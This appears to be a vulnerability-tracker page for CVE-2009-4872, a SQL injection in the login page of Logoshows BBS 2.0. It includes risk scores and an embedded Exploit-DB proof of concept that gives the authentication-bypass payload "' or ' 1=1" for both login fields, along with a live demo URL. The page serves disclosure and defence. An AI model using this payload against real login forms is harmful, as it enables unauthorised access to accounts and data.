CVE-2009-4872

high
Published 2010-05-11 · Modified 2026-04-29
CVSS v3
—
CVSS v4 NEW
—
not yet in upstream
VIR risk
8.5

Description

Multiple SQL injection vulnerabilities in globepersonnel_login.asp in Logoshows BBS 2.0 allow remote attackers to execute arbitrary SQL commands via the (1) username and (2) password fields.

Predictions

Exploit likelihood
20%
Patch ETA
—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-9399 webapps php verified text · 1 KB
Dns-Team · 2009-08-07

Logoshows BBS 2.0 - Authentication Bypass

text exploit Source: Exploit-DB
#############################################################################
#                 		                                            #
#         Logoshows BBS 2.0 (Auth Bypass) SQL Injection Vulnerability       #
#                                                                	    #
#############################################################################

#############################################################################

[~]    -=[Dns-Team Marocain Hackers]=-

[~] Author: Dns-Team

[~] Contact: Q2[at]HoTmail[dot]Fr

[~] Site: www.Scam4u.com + www.Dns-Team.com

[~] Greetz: Sa4d + HSMX + Stack + PR0H4CK3RZ  + N@bilX + Ga3 Réjà là Xd :)

[~] Download : http://www.logoshows.com/download/bbs88.rar

#[---------------------------------I'm Kh0K0m MÃ N!x--------------------------------------]
[»] Demo :
#
# http://www.logoshows.com/bbs/globepersonnel_login.asp
#
[»] Exploit :
#
#  username : ' or ' 1=1
#  password : ' or ' 1=1
#
#[------------------------------------------------------------------------------------]
#                  -   - +- Tnx Str0ke For UR Support -+ -  -
#########################################################################################################


# milw0rm.com [2009-08-07]

Application impact

VendorProductVersionsFixed
logoshowslogoshows_bbs2.0

References

CWEs

CWE-89

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.